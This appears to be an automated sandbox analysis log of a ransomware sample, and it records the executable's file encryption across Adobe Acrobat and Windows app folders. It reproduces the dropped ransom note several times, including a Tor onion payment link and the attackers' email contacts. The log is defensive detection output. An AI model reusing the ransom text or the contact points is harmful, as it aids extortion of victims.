Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Writes many files with high entropy
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak entropy: 7.99972157706Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe entropy: 7.99559842063Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatRes.dll entropy: 7.99999027504Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe entropy: 7.99943763961Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe entropy: 7.9999451581Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\9c09c81a3293a6f9820cb9d43546c552972469999723291e28c55f33c87de532 entropy: 7.99953699082Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak entropy: 7.99977671923Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\8c939f6ee06ca9717f7931e0accddd517b5609c30d56d0f8b83436eed1c18bb0 entropy: 7.99930818189Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll entropy: 7.99985687655Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\8e880d7bb6ea337763272a03a43b29bbf6d776b389e773d2ea88f49e781bc7d9 entropy: 7.9988720778Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\921ae2be6f2c0c4f5d0612de464ac6be9b75354010d4c8c367cf25fe0bff1b16 entropy: 7.99744660153Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt entropy: 7.99350533667Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\icudtl.dat entropy: 7.99998450782Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe entropy: 7.99993514167Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\b3a5292904d011b22b8911cbdfc6f842a99f6f0814b738a7235ad3a269e258a4 entropy: 7.99960404887Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\bb0f587a0db0572a7f0897d4ad538a5fd91259f16df486474df5fa431209bf59 entropy: 7.9994441393Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak entropy: 7.99948323239Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\9c48d8ef015852b5905a97c1870055d3fa24fe16b9ab57e7f4909593af3e9322 entropy: 7.99959634894Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\abe617f1af7a43a8c0ef3145e53d5e69b32cca5362f7f2b262c53b1051dc4e1e entropy: 7.99945384551Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\resources.pak entropy: 7.99997629934Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\e22cc4414d69397e092363fd311bdcb60e201d571917209f69afb053169aeeef entropy: 7.99952819518Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\ffd5710fd5bff1cd638b7557a0f0b169446159bb972f75fe422e6eb3a2b043be entropy: 7.99951652986Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\1696333703 entropy: 7.99693058231Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1696408273 entropy: 7.99610942344Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1696420884 entropy: 7.99603129503Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsAlarms_8wekyb3d8bbwe!App entropy: 7.99512715955Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App entropy: 7.99481367213Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsStore_8wekyb3d8bbwe!App entropy: 7.99451653038Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCalculator_8wekyb3d8bbwe!App entropy: 7.99505265413Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Explorer entropy: 7.99522099765Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32 entropy: 7.99531039351Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_AdministrativeTools entropy: 7.9954171701Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Computer entropy: 7.99455698021Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel entropy: 7.99532698994Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop entropy: 7.99474015618Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!App entropy: 7.99386998055Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Shell_RunDialog entropy: 7.99466450473Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe entropy: 7.9950766422Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cmd_exe entropy: 7.99554295732Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\USOPrivate\UpdateStore\store.db entropy: 7.99998577804Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\MSEdge entropy: 7.99509973664Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc entropy: 7.99569161612Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_magnify_exe entropy: 7.9954153521Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe entropy: 7.99430526978Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe entropy: 7.99517754125Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe entropy: 7.99410244104Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe entropy: 7.99373983415Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe entropy: 7.99547961522Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe entropy: 7.99550978151Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe entropy: 7.99453368476Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_narrator_exe entropy: 7.99500829729Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp entropy: 7.9997140245Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp entropy: 7.99969166356Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe entropy: 7.99503742173Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe entropy: 7.99481237127Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe entropy: 7.99484163934Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc entropy: 7.99470729912Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe entropy: 7.9944782001Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc entropy: 7.99384963711Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe entropy: 7.99503207683Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99112777195Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_osk_exe entropy: 7.99467351336Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc entropy: 7.99508649032Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe entropy: 7.99491223718Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe entropy: 7.99463345617Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7-zip_chm entropy: 7.99515118395Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe entropy: 7.99480999386Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99535959301Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe entropy: 7.99504301156Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.9935856747Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.9950928826Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99179545182Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99252562177Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe entropy: 7.99503438603Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_exe entropy: 7.99527433979Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_x64_exe entropy: 7.99510873069Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7zFM_exe entropy: 7.99437109439Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Adobe_Acrobat DC_Acrobat_Acrobat_exe entropy: 7.9950534155Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99494061925Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99687282116Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe entropy: 7.99478144595Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99393937985Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe entropy: 7.99971298097Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\5091e1ba9bca4548a55e05605447918b_1 entropy: 7.99511096682Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\71dd91a867a24f4a8b8f55514985d2cc_1 entropy: 7.99454410272Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99926664607Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99397041016Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99772938556Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.99785272493Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99705862036Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal entropy: 7.99984929044Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js entropy: 7.99532813021Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js entropy: 7.99871451912Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\70K_VXHc5sjoBPg97hL1pHJ7wo4.br[1].js entropy: 7.99953706637Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js entropy: 7.99886119232Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js entropy: 7.99859672177Jump to dropped file
